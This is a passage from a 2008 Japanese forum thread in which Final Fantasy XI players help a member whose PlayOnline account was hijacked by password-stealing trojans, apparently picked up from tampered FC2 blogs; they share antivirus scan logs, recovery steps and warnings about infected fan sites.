E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP583\A0067872.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP584\A0068007.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP584\A0068071.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP584\A0068284.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP584\A0068370.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
86既にその名前は使われています:2008/03/24(月) 07:23:29.42 ID:rCHR+RwE
続きです

E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP585\A0068454.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP589\A0069244.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP589\A0069282.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP589\A0069295.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP589\A0069311.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP590\A0069323.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP590\A0069332.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP590\A0069333.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP591\A0069345.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP591\A0069346.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
87既にその名前は使われています:2008/03/24(月) 07:25:18.69 ID:rCHR+RwE
E:\WINDOWS\Help\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\WINDOWS\Help\3EC849F38E63.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\WINDOWS\system32\1.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\WINDOWS\system32\2.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
E:\WINDOWS\system32\explorerf.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
E:\WINDOWS\system32\krnp32drv.dll 感染: Trojan-PSW.Win32.OnLineGames.pnr スキップ
E:\WINDOWS\system32\systemlf.dll 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ

これで一応全部オンラインスキャンが終わりました。
1つづつ探して何か別の場所に保存して
http://www.mcafee.com/japan/security/contactavert.aspへ送れば良いんでしょうか
8880:2008/03/24(月) 07:30:20.21 ID:QCo+vR7/
>>84
私の場合、URLの//(ダブルスラッシュ)直後とブログIDが一緒なのですが
他の方は違うor変更することもできるのでしょうか。

間違っていた事を書き込んでしまっていたら申し訳ありません。
スルーしてください(´・ω・`)
89既にその名前は使われています:2008/03/24(月) 07:48:39.60 ID:vtt50urT
>>87
>>87 のだけでいいよ。他は復元の領域(触れない)や
IEのキャッシュ(一時ファイル消せば消える)で重複してる。
McAfee使ってるなら送り先はそこのメールで。
WebImmuneには俺アップしてるんだけど、どうも放置されてる。
90既にその名前は使われています:2008/03/24(月) 07:51:12.33 ID:vtt50urT
>>88
FC2IDはメールアドレスだったと思う。
管理画面の「ようこそ○○さん」とは関係ない。
91既にその名前は使われています:2008/03/24(月) 07:54:00.87 ID:MKZHUFJz
>>88
詳しく書かないがブログIDとログインIDは別物。
知らないってことはブラウザにIDとパス記憶させてる?危険だよそれ。
ハックされたブログもクッキー使ってたか知りたいな。
92既にその名前は使われています:2008/03/24(月) 07:54:55.32 ID:rCHR+RwE
>>89
わかりました、探してまずは圧縮してみます<(_ _)>
9380:2008/03/24(月) 08:06:40.96 ID:QCo+vR7/
>>90>>91
確認してきましたが、ログインIDは記憶させていました。
そのせいだったんですねorz

>>84さん、失礼致しました。
94既にその名前は使われています:2008/03/24(月) 08:08:45.04 ID:rCHR+RwE
あと気になったファイルがあったので載せておきますね。
オンラインスキャンの結果をメールで報告するトコがありますよね?
出てきたファイルが↓です。

kavonline0.vir
kavonline1.vir
kavonline2.vir
kavonline3.vir
kavonline4.vir
kavonline5.vir
kavonline6.vir

どこにあったのかまではわかりませんでした。
95既にその名前は使われています:2008/03/24(月) 08:09:36.93 ID:wiMjf6Lx
Mac用のPG2みたいなソフトないですか…
96既にその名前は使われています:2008/03/24(月) 08:15:42.99 ID:vc86vULj
>>88の言いたい事が何となく分かる。
ブログ取得するのに確かにFC2IDが必要で、それは登録したメルアドなんだけど
ブログ取得する際にブログIDが発行されて、それはブログのアドレスに組み込まれてる
 ttp://ブログID.blog××.fc2.com/
こんな感じに。

で、プラグインのリンクを使ってると、リンクの一番下に管理者ページの入り口があって
そこで求められるのは、FC2IDかブログID、どっちでも良いんだ。パスワードは両者共通。
分かりにくかったら、適当なFC2のブログから管理者ページに飛んで見てもらいたい
このへんがFC2が狙われる理由なんじゃないかと思っている。

…見当違いの事言ってたら済みません。
97既にその名前は使われています:2008/03/24(月) 08:36:21.56 ID:HWQPHJQs
>>96あってるとおもうよ
98既にその名前は使われています:2008/03/24(月) 08:40:55.56 ID:h9kMfdX+
>>91
FC2ブログは使ってないので知らないけど、普通はIDとパス記憶させるのは
オートコンプリートの方じゃないかな
99既にその名前は使われています:2008/03/24(月) 08:42:27.44 ID:Q/ktx4QO
>>85
おつかれさん。仮眠して少しは落ち着いたかな?

まずは、サポセンに電話して、アカウントを丸ごと止めさせるんだ。

次に、PCをネットからケーブルごと引っこ抜け。
感染している以上、外部から完全に掌握されていると思ってくれ。

それから、ブラウザの履歴見て、PCの動作ががつんと重くなったと
感じたあたりを思い出してみて。
ポイント的には、なんちゃら.jp以外のところ。

そして、ワームの検体の提出を考えるのは最後にすること。
なぜなら、既に検出できてるわけだから、カスペルスキーは対応できてる。
どれを検体とするかは、リストから拾っとくよ。
10098:2008/03/24(月) 08:43:24.33 ID:h9kMfdX+
普通はIDとパス記憶させるのは (クッキーじゃなくて)オートコンプリートの方じゃないかな
ってことね

オートコンプリート履歴とクッキーは別物だから、それぞれ別の手順で削除しないとダメ
101既にその名前は使われています:2008/03/24(月) 08:45:50.22 ID:rCHR+RwE
おはようございます<(_ _)>

>>99
上から順番に読んできましたが前スレの>>168の方と同じ症状がありましたorz
2週間前ぐらいに時計が2000年と表示されてたのを覚えています。
?と思ったんですが、気がついたときには元に戻っていたのでそのままにしておきました…
十日前にココを見ていれば防げたかもしれませんね…いまさらですがorz

サポートセンターが空くまで時間がありますので少し情報?を
攻略サイトでよく見ていたところはからくりwikiぐらいです。
それと、からくりを上げてる人のブログを2〜3箇所回りましたが覚えていませんorz
Yahooやグーグルの検索で出てきたところを見た気がします。

良く行くサイトはYouTubeとニコニコです。
その他のサイトはほとんどスレに貼られたアドレスから飛んでいました。
P2Pというとウィンニーやシェアでしょうか?
友人に勧められてインストールしましたが、設定がわからないので使った事はありません。
102既にその名前は使われています:2008/03/24(月) 08:48:02.79 ID:60BI5hP8
検知しました: ウイルス Net-Worm.Win32.Allaple.a ファイル: D:\etc\Rep\2007年\9月\FFXI 2007年09月27日18:43.htm

これやばい?
103既にその名前は使われています:2008/03/24(月) 08:53:04.68 ID:HWQPHJQs
これやばいこれやばい聞く前にウィルス名でぐぐって見ろと
104既にその名前は使われています:2008/03/24(月) 08:57:00.76 ID:60BI5hP8
ググったけど件数少なすぎてわからないんです・・・
誤検知なのかな?
105既にその名前は使われています:2008/03/24(月) 08:58:10.98 ID:cSZUGl4j
つーかヤバくないって言われたらどうすんだよw
飼ったままにしとくのか?
106既にその名前は使われています:2008/03/24(月) 08:59:38.43 ID:60BI5hP8
誤検知なんだったら処理しない?を選ぼうかと・・
107既にその名前は使われています:2008/03/24(月) 09:02:28.57 ID:rCHR+RwE
>>99
忘れてましたorz夜はありがとうございました<(_ _)>
いまは大分落ち着いています。ホント頭が真っ白になりました。

2ちゃんねるのみなさんには色々お手数をかけてしまって、本当にありがとうございます!
今、体験版をダウンロードしてインストールしてます。

追加報告ですが、公式サイトのPOL会員情報にはログインできるようになりました。
ゲームのほうは試してませんが、ログインはちょっと様子を見たほうが良いですか?
108既にその名前は使われています:2008/03/24(月) 09:05:33.12 ID:HWQPHJQs
109既にその名前は使われています:2008/03/24(月) 09:07:23.92 ID:HWQPHJQs
おっと途中で送信
Allaple.aでぐぐって15300件も出てきました
どうやってぐぐったんだ?w
110既にその名前は使われています:2008/03/24(月) 09:13:32.82 ID:Q/ktx4QO
111既にその名前は使われています:2008/03/24(月) 09:14:18.71 ID:60BI5hP8
net-Worm.Win32.Allaple.a
でぐぐってました
112既にその名前は使われています:2008/03/24(月) 09:14:51.88 ID:RKvWaEx6
危険といわれているブログには行った覚えがないものの
一連の騒ぎで不安になり、一応カスペルスキーでスキャンしてみたらこんなのが出てきました。

C:\Documents and Settings\Application Data\Symantec\Norton AntiVirus\Quarantine\294E6D1E.jpg 感染: Trojan.VBS.IFrame

しかしノートンでスキャンしてもなんの反応もないし、そもそもノートンのプログラムの一部に思えるのですが
これはなんらかの対策をしたほうがいいんでしょうか?
11380:2008/03/24(月) 09:15:15.72 ID:QCo+vR7/
まさに>>96さんの言うようにログインしていました。

キャッシュやオートコンプリートなど全て削除してみましたが
ここからならブログIDでログインできてしまうんですね。

うちはマイナーブログですがこのままFC2を使い続けるのは不安が残ります…。
やはりブログは閉鎖して、しばらく様子を見ようと思います。
114既にその名前は使われています:2008/03/24(月) 09:15:35.01 ID:QuC4Hos4
>>112
ちょっと上のレスぐらい見ろ
115既にその名前は使われています:2008/03/24(月) 09:20:08.13 ID:rpE40Jdl
>>107
おはようございます。PCはクリーンになるまでそれでインしない方がいいと思います
このスレでも、2度ハックされたって方もいましたし。
PG2はhttp://miku.a.orn.jp/miku6/index.htmlでわかりやすく説明してくれてるので
よかったら参考に。上のアドレス踏むの怖かったら、アグサで調べてからとかでも><
116既にその名前は使われています:2008/03/24(月) 09:23:57.04 ID:lzZx8A86
>>102
ファイル名だけ見る限りは、誤検知かもしれないけど、
駆除しておいたほうがいいんじゃない?
117既にその名前は使われています:2008/03/24(月) 09:27:13.76 ID:Q/ktx4QO
>>107
「公式サイト」が何を意味するか分からないが、
PlayOnLineにログインできたってことかな?

で、PlayOnLineにログインできたのなら、
ログインできた日時とID/pwをメモしておいて。
まずは、PCの面倒よりも自分のアカウントの状況を
□eに認識してもらうのを最優先しすべく、
>>7-9の準備しておこう。

繰り返すが、PCは常時接続にせず、必要最小限のときに接続すること。
PCを落としておくということでもかまわん。
118既にその名前は使われています:2008/03/24(月) 09:28:41.97 ID:rCHR+RwE
>>115
わかりました。しばらく様子を見てみます<(_ _)>ありがとうございます!
サイトのほうも見て来ました。簡単なようですので入れられるようなら入れてみます。

関係ないですが、このカスペルキーの検知した時の音が怖いですorz
119既にその名前は使われています:2008/03/24(月) 09:30:24.35 ID:HZjEcLif
いやちょっと待て
垢ハックされて昨日の夜はログインできなくて今日出来るっておかしくね?
サポセンまだ開いてないぞ

ただのパスワード入力ミスじゃ…
120既にその名前は使われています:2008/03/24(月) 09:31:10.08 ID:rCHR+RwE
>>117
FF11の公式サイトにある、POL会員サポートのところにログインできました。
今からもう一度行ってみて、回線を切っておきます<(_ _)>
ありがとうございます!
121既にその名前は使われています:2008/03/24(月) 09:33:59.95 ID:Q/ktx4QO
>>112
ttp://www.mcafee.com/japan/security/virD2003.asp?v=DoS-iFrameNet
これ読んでどうすればいいか分かれ。
122既にその名前は使われています:2008/03/24(月) 09:35:56.39 ID:lzZx8A86
>>119
それか、業者がパスを元に戻したとかかね
123既にその名前は使われています:2008/03/24(月) 09:36:11.19 ID:rCHR+RwE
これが落ち着くまでの最後の書き込みです。
>>119
会員情報で自分が操作した履歴を見れるんですが
機能私が変更したのは一回だけですが↓のような結果が…orz

サービス利用履歴の確認 > プレイオンライン
年月日 サービス名 アクション
2008/03/24 プレイオンライン
POLパスワード 変更
2008/03/23 プレイオンライン
POLパスワード 変更
2008/03/23 プレイオンライン
POLパスワード 変更
2008/03/23 プレイオンライン
POLパスワード 変更
2008/03/23 プレイオンライン
POLパスワード 変更
2008/03/03 プレイオンライン
POLパスワード 変更
124既にその名前は使われています:2008/03/24(月) 09:37:09.52 ID:rpE40Jdl
ううん、何でPOL入れたのかな。バハスレで新しいレジコメールに送ったってあったから、それ使ったのかな?
プレイ中に落とされたって書いてたから、パスワード入力ミスって事はないんじゃないかな
125既にその名前は使われています:2008/03/24(月) 09:37:42.70 ID:rpE40Jdl
ごめん、かぶったorz
126既にその名前は使われています:2008/03/24(月) 09:39:22.55 ID:h5QlJmlh
>>119
ログインしてる最中に後から同じIDでログインされると先にログインしてる方は落とされるんだよ。
ID、パスの間違いじゃない。
その後、ログイン合戦があってパス変更されてしまい、ログイン出来なくなったらしい。
127既にその名前は使われています:2008/03/24(月) 09:39:27.24 ID:Q/ktx4QO
>>119
それなら、ヴァナのことは放って、PCの始末に専念できるってことさ。
今は、アカウントの保持だよ。

感染してる=ハックされてると仮定してたが、PCが感染により重くて
POLとの通信が切れたこともあり得るね。

>>120
>>119の可能性もあるので、前回落とされた時間とさっきログインできた時間を
サポセンに連絡して、その間のログインがあったかの調査を頼んでおきなはれ。
128既にその名前は使われています:2008/03/24(月) 09:40:01.67 ID:CHzqP0my
>>123
これは怖い
129既にその名前は使われています:2008/03/24(月) 09:42:22.93 ID:wiMjf6Lx
>>110
ありがとうございます、恩にきます
130既にその名前は使われています:2008/03/24(月) 09:43:46.33 ID:rpE40Jdl
なんでこんなに書き換えられて?本人が書き換えたのが今日ではまだないですよね?
業者側が何度もかえてたんだろうけど・・・どうしてだろう?
131既にその名前は使われています:2008/03/24(月) 09:46:36.60 ID:Q/ktx4QO
>>123
よく気が回ったね。いい情報拾った。
2回目以降の状況がどう見ても異常だというのが読み取れる。
それぞれのパスワード変更のときの接続元IPが違うだろうから、
それも申し入れておくといい。

で、業者側が痕跡を残さないように元に戻したとも考えられるか。
# アイテムがなくなってるか、変なところにいるはずなのでバレバレだがね。
ま、この辺は業者しか分からない訳なので、こういう例があると記憶しておこうや。
132既にその名前は使われています:2008/03/24(月) 09:53:17.18 ID:h9kMfdX+
>>126
その説明じゃまだイマイチ分らないんだけど、パスを変更されても変更する前の元のパスで
POLにログインできるってこと?
それはそれでPOLのセキュリティに問題ない?
133既にその名前は使われています:2008/03/24(月) 09:57:38.66 ID:h9kMfdX+
あぁ、ごめん勘違いしてた(´・ω・`)
134既にその名前は使われています:2008/03/24(月) 10:10:57.98 ID:Q/ktx4QO
>>123
3時過ぎに鯖板に晒してたメアドに昨日のIDをタイトルにしたメールしてあるからなっと。
135既にその名前は使われています:2008/03/24(月) 10:20:14.40 ID:xnmW2Y33
こんなスレあったんですね。
少し前にPCが重いので、@niftyの無料ウィルスチェックしたら
Trojanなんたら、種別:トロイの木馬 というのが検出できました。
ウィルスの駆除ボタンを押しても駆除失敗と出るだけなので、
強引にそのファイルごと全消去しました…。
POLは電話してパスワード変更してもらって(←今までのパスワード忘れてしまってた)、
その後何度かウィルスチェック(@niftyのとこですが…)をかけてますが
検出されてません。
でもここ見ると、カスペルスキイというのでしか検出できないみたいですね。
ウィルスが消えてるのか、それとも単に検出できないだけなのか…
136既にその名前は使われています:2008/03/24(月) 10:25:49.35 ID:xXZ5UG8T
個人的メモ

@niftyウイルスチェックサービス:@nifty(カスペルスキーと同じエンジンらしくてしかも駆除もしれくれるらしい)
http://www.nifty.com/security/vcheck/

Firefoxをこの際入れてしかも今まで2chブラウザを使ってなかった、bbs2chreaderというアドオンを入れてみよう

【韓国 中国】PeerGuardian 23【YBBを弾こう】
http://tmp7.2ch.net/test/read.cgi/download/1204341836/
lt;丶`∀´gt; PeerGuardian2 ★2 (`ハ´ )
http://pc11.2ch.net/test/read.cgi/sec/1129612402/


137既にその名前は使われています:2008/03/24(月) 10:48:24.12 ID:Q/ktx4QO
>>135
よく消せたねぇ...
138既にその名前は使われています:2008/03/24(月) 10:48:34.53 ID:0fYn7lrn
ログインできたのならとりあえずアイテムなくなってるかだけでも確認したほうがいいんじゃない?
139既にその名前は使われています:2008/03/24(月) 10:49:25.93 ID:Yz0CGQZ+
パスワード変更したならログインしないほうがいい
140既にその名前は使われています:2008/03/24(月) 10:58:16.75 ID:cxfdIhE2
>>112
それノートンがすでに隔離したファイルだと思うが
ノートンの使い方の中で隔離ファイルの削除を探すんだ

>>114
上のレスってどれ?
同様の質問がfc2ブログを見に行ったらスレにあったがそっちのこと?
141既にその名前は使われています:2008/03/24(月) 11:07:19.86 ID:/brrgtmu
>>140

114じゃないが…

FC2ブログを見に行くと垢ハックされるぞ
http://live27.2ch.net/test/read.cgi/ogame/1206155257/

コッチのスレとゴッチャになってしまったんじゃないかな?

>>112に関してのレスは下記参照

http://live27.2ch.net/test/read.cgi/ogame/1206155257/542-544
142既にその名前は使われています:2008/03/24(月) 11:08:29.60 ID:586YcECP
>>878
感染もなにも、「Ace Password Sniffer」はオンライン販売されているソフト
フリーのパケットキャプチャソフトにパスワード抜き出しツールを被せたもの
シマンテックはこれを「好ましからざるソフト」に分類した
カスペルスキーがWinnyやShareを「好ましからざるソフト」扱いするのと同じ

みんなが説明してくれているように、リピータハブを使っていてかつ業者と
同居していなければPS2やXBOXがやり取りするデータがPCに流れることはないよ
たとえ流れても、専用の解読ツールでも作らない限りパスは抜けない


前スレの886からするとPS2なら安全ということなの?
ハブみてみたらリピーターだったんだが家には業者らしき人間はいない。
143既にその名前は使われています:2008/03/24(月) 11:11:17.81 ID:QdOH9ZPy
>>36
ブログ主が小遣い稼ぎで中華広告を埋めたという線もあるからな
144まとめ”管理”人 ◆mj63/8nmCU :2008/03/24(月) 11:14:25.55 ID:6zivGh2w
過去ログの方のまとめ管理人です。コテワード忘れてしまったので変わります。すみません本人です。
今現在の過去ログは950〜以降が取りきれてないものが若干ありますがup完了しています。

>>79さんありがとうございます。ログ補完できました。

被害抜粋も再開していきますのでお待ち下さい。

あとサイトにも書きましたがinfoseekのメルアドが送受信不具合を起こしています。(知人からのメールで発覚)
今現在届いてるメールには返信は終わってますが返事がない方は

matome★ort.sakura.ne.jp
(ほしを@にかえてください)

お手数ですがこちらに再送よろしくおねがいします。
145ログまとめ ◆mj63/8nmCU :2008/03/24(月) 11:29:52.41 ID:6zivGh2w
うわ・・・名前に管理と入れると自動に””が付くんですね。
他の管理の方と紛らわしいので変えました。スレ汚しすみません
146既にその名前は使われています:2008/03/24(月) 11:46:43.59 ID:E6d3p/DA
Lirisです。先ほどサポートセンターへ連絡してきました。
ログインの履歴から、私が寝た後にログインされていて、不正アクセスの可能性が高いという事です。
一度、サポートセンターからもらったパスワードでPOLとFF11へログインしキャラクターの状態を確認。
なくなってるアイテムもなく、お金もそのままでした。

おそらく私が書き込んだあとにGMを呼んで下さった方々のおかげだと思います。
倉庫の方も無事を確認しました。キャラクターの移動もなく、ホントそのままの状態です。
ログアウトしたあと、また新しいパスワードをもらいましたので、
パソコンの方が綺麗になってからログインしようかと思います。

サポートセンターの方からウィルスの情報がありましたら教えてください、という事で
・重要な領域
E:\WINDOWS\Help\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb
E:\WINDOWS\Help\3EC849F38E63.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb
E:\WINDOWS\system32\1.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb
E:\WINDOWS\system32\2.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj
E:\WINDOWS\system32\explorerf.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj
E:\WINDOWS\system32\krnp32drv.dll 感染: Trojan-PSW.Win32.OnLineGames.pnr
E:\WINDOWS\system32\systemlf.dll 感染: Trojan-PSW.Win32.OnLineGames.fcj
を報告して来ました。
147既にその名前は使われています:2008/03/24(月) 11:48:27.80 ID:E6d3p/DA
実際に被害(キャラ・アイテム等)にないと言うことですが、
不正にアクセスされたという結果は犯罪なので、
警察の生活安全課に、ご自身の判断で通報・被害届けを出してください、とのことです。

ここでたくさんの応援と助言をありがとうございました<(_ _)>
たぶん、みなさんがいなければ泣き寝入りしていたかもしれません。
私のような結果は、もしかすると稀なのかもしれませんが、
キャラクターがいなくなったり、アイテムがなくなったりする人が実際にいるんですよね…
こういう被害者が出ないように祈っています。

私だけではどうしようも出来なかった事だと思っていますので感謝しきれません。
本当にありがとうございました!<(_ _)>
148既にその名前は使われています:2008/03/24(月) 11:55:41.59 ID:lsU5BPJR
>>146
被害が無くて本当に良かった。
でもハックしてログインしておきながらギルに手をつけないってなんなんだろう?
あえて取るほどでもない金額とかだと被害に合わないのかな?
参考までに所持金額が知りたいです。失礼な質問でごめん(´・ω・`)
149既にその名前は使われています:2008/03/24(月) 11:57:33.35 ID:E6d3p/DA
>>148
所持金ですか…orz
恥ずかしいですが、メインで4万ギルちょっとです(;´д⊂)
倉庫には忍術の束しか入れてませんでした。
150既にその名前は使われています:2008/03/24(月) 12:00:06.03 ID:37tZuH3A
そこまでやられてると、必要なユーザーデータをバックアップ後
初期化ー>パッチ適応ー>再インストールしたほうがいいかも

ブックマークとか忘れがちだけどね
年賀状ソフトのデータとかも忘れて入れなおしたなぁ〜今年
151既にその名前は使われています:2008/03/24(月) 12:06:10.84 ID:V0clbcIb
>>149
キャラだけチェックして、優先順位的に下位のほうにされたということかなぁ。
何はともあれお疲れさんでした。
152既にその名前は使われています:2008/03/24(月) 12:09:42.70 ID:xXZ5UG8T
>>146
乙です
今後の人のためにその検出したアンチウィルスソフトも報告されたほうがいいですよね。
ブツは同じでもアンチウィルスソフトのメーカーによって名前が変わる事も稀によくあることですし。
153既にその名前は使われています:2008/03/24(月) 12:12:04.46 ID:lsU5BPJR
確かにこれだけパス抜かれてる人が多いと、
業者も売り捌きやらなんやらで忙しいんだろうな…。

>>149
4万かー。参考になったよ。ありがとう(`・ω・´)
154既にその名前は使われています:2008/03/24(月) 12:17:08.53 ID:2iutMXe5
素人なもんで教えてください
ブログが危ないのはわかったが、ELEMENとかは大丈夫なんだろか
(o・v・o)?
155既にその名前は使われています:2008/03/24(月) 12:17:20.29 ID:E6d3p/DA
>>151
そうなのかもしれませんね…
あとは素早くたくさんの人が対処してくださった結果のだと思います。

>>152
カスペルスキー オンラインスキャナ レポート
2008年3月24日 1:20:33
OS: Microsoft Windows XP Home Edition, Service Pack 2 (Build 2600)
カスペルスキー オンラインスキャナ バージョン: 5.0.98.0
データベースの最終アップデート: 23/03/2008
データベースのレコード: 655233

↑これがスキャンした時のです。
今は体験版で削除をしてますが、>>150さんの助言どおり終わったら再インストールするつもりです。

やっと安心できますorzホント気が気じゃなかったです。
みなさんのレスがなかったら一人で悶々としてるしかなかったですよ…
何かありましたらまた報告しますね。
お礼ばっかり言ってる気がしますが、言わせてください<(_ _)>
色々とありがとうございました!
156既にその名前は使われています:2008/03/24(月) 12:21:35.09 ID:5JqdShUs
再インストール後はWindowsUpdateを忘れずに

http://windowsupdate.microsoft.com/
157既にその名前は使われています:2008/03/24(月) 12:29:12.48 ID:KjMFND3D
>>146          おつかれさまでした。キャラ無事でなによりです。


少しGMの対応かわった?前の報告だとウィルス名とか聞いてたっけ?
158既にその名前は使われています:2008/03/24(月) 12:34:14.42 ID:DC8kpJkf
新たに福建中華の罠ドメインが登録されていたので気をつけてくれよな!
ブログ改竄騒ぎよろしく早ければすでに使われているはず。

Domain name: gamelaone■com
longyan Fujian 364000
Created: 2008-03-22
159既にその名前は使われています:2008/03/24(月) 12:36:47.46 ID:cSZUGl4j
ガメレオン涙目じゃね?
160既にその名前は使われています:2008/03/24(月) 12:39:21.34 ID:rwIEyNv5
フォルダ構成理解してない奴ばっかだな
こんなバカだらけだと垢ハックは減らないわ
161既にその名前は使われています:2008/03/24(月) 12:39:47.32 ID:vQXYTLxz
パッケ買ってせこせこと複数PC上でツール使いながら活動するよか楽に金が稼げる
手段としてやってるんだろね。

162既にその名前は使われています:2008/03/24(月) 12:42:05.87 ID:DZlVuT/f
>>146じゃないけど、二、三日前にハックにあって何も被害無し。対応の仕方も同じ。ウィルスが原因。

俺の場合、inしてる時に他からログインされて、相手とログイン合戦になった結果パス変えられてって感じ。
手持ちの他垢からGMに伝えたけど電話じゃなきゃ無理だった。

知らない誰かと自キャラでログイン合戦してる恐怖感はトラウマだわ。 長文チラ裏スマソ
163既にその名前は使われています:2008/03/24(月) 12:42:30.25 ID:cSZUGl4j
単発で急に切れる奴何なの?w
164既にその名前は使われています:2008/03/24(月) 12:42:51.55 ID:sV5MTkg6
とにかく■は公式の目立つところに垢ハクの注意勧告を載せるべきだな。
ネ実で対策が進んでるのに、まったくあきれるほど保身を優先する会社だぜ。

問題を認めると、問い合わせやら責任問題やらの対応に手がかかると思ってんだろうな。
■が無視してるそのあいだにも被害は拡大しているというのに。
165既にその名前は使われています:2008/03/24(月) 12:43:21.80 ID:CpNX2ymN
ところで、オートログインのネットゲームって一般的な存在なんだろうか?
166既にその名前は使われています:2008/03/24(月) 12:46:49.68 ID:xXZ5UG8T
>>155
俺らにもだけど、そのサポートセンターさんにということでした。
紛らわしくてソマン
167既にその名前は使われています:2008/03/24(月) 12:53:18.90 ID:O+2gK/uP
ペコログ踏んじまった。
avastとSpybot無反応だ。。
カスペ落としてスキャンせねば><
168既にその名前は使われています:2008/03/24(月) 12:58:43.37 ID:Q/ktx4QO
>>146
ヴァナ無事確認おめでとう! 本当によかった。

>>149
いわゆる高額保有者ではなく、異次元価格品もなかったので、
業者も困ったってとこかw
君はわしか?w

で、>>150のいうとおりだと思う。
何かしら住んでる可能性あるし、バックドア1度開けられて、IP拾われてるだろうから
業者さんからアタック掛けられる可能性も残る。
ので、ウィルス対策単体ではなく、一式面倒を見てくれるソフトを入れておくのを
お勧めする。
鍵は多重に掛けるでしょ?

>>156
最近は、MicrosoftUpdateがよいよ〜。
MS-Officeのも引っかけてくれるから。
169既にその名前は使われています:2008/03/24(月) 13:03:27.16 ID:NX6Uk0kR
>>167
まだペコログにトロイ残ってるのかな?
170既にその名前は使われています:2008/03/24(月) 13:05:26.80 ID:O+2gK/uP
>>169
もう大丈夫なのかな><
カスペの無料体験ルーレットが90日引けなくてリトライ祭してたところ。。
171既にその名前は使われています:2008/03/24(月) 13:10:26.54 ID:NX6Uk0kR
>>170
前スレで警告されてたけど、
ぺころぐにトロイがあるってこちらが聞いたのは
金曜日の話なんだよね。
FC2ブログは今回の話見てから一切開いてないけど
金曜日から見てる人は注意したほうが良いかもしれない。
今も治ってるかどうかもわからないし。
また情報が入ったら書き込みします。
172既にその名前は使われています:2008/03/24(月) 13:11:05.57 ID:13N6BdxD
スクエニはいつまで静観してるつもりだろうな…
被害が一気に増えたりでもしら悪い意味で有名になるだろうに…
173既にその名前は使われています:2008/03/24(月) 13:13:25.17 ID:zZKH+Aj5
つうかマンガ喫茶とかつかうほうがアホなんだろ
自宅だけにして、LSコミュニティも利用しないほうがいい
174既にその名前は使われています:2008/03/24(月) 13:21:38.03 ID:HWQPHJQs
>>154
お前のかおもじが気に入らない
175既にその名前は使われています:2008/03/24(月) 13:23:13.70 ID:Q/ktx4QO
>>170
こんなのもあるぜ? 左側に30日体験のバナーがある。
ttp://www.mcafee.com/japan/mcafee/home/
176既にその名前は使われています:2008/03/24(月) 13:49:30.88 ID:vtt50urT
dda3■net、hellh■netに続くfccja■comのトロイのスキャン。
各社への検体提出から23時間経過。
Kasperskyに続きAntiVirも撃墜するようになったものの、そこから変化なし。
ttp://www.virustotal.com/analisis/ae4b34f1f08f6dd6d93f3574b1fe6f04
177既にその名前は使われています:2008/03/24(月) 13:51:50.72 ID:47bjLYLG
ペコろぐソース見てきたけど、自分で見た限りでは変なスクリプトはなかった感じ。
3/22に管理人様の書き込み記事で対処済みとあるのと、今現在は大丈夫そう。

まぁ、ただ再度やられているサイトさんあるから一度やられたサイトさん見るときは
気をつけないとだねぇ。
178既にその名前は使われています:2008/03/24(月) 13:55:10.96 ID:vtt50urT
ペコろぐ。 (罠撤去済み)
ヴァナモンblog (罠撤去済み)
FF11初心者の館 (ウイルス散布中)
179既にその名前は使われています:2008/03/24(月) 14:09:41.96 ID:37tZuH3A
もうFC2はソースチェッカーでチェックしてからじゃないと
怖くて踏めないな...
180既にその名前は使われています:2008/03/24(月) 14:11:42.90 ID:37tZuH3A
181既にその名前は使われています:2008/03/24(月) 14:31:36.43 ID:vTR+hCx8
注意age
182既にその名前は使われています:2008/03/24(月) 14:34:20.69 ID:Httpif6H
ぶっちゃけFC2側としてはたいして被害あるわけじゃないから
必死こく必要ないんだよなぁ
183既にその名前は使われています:2008/03/24(月) 14:45:51.90 ID:Ny3ZGjXA
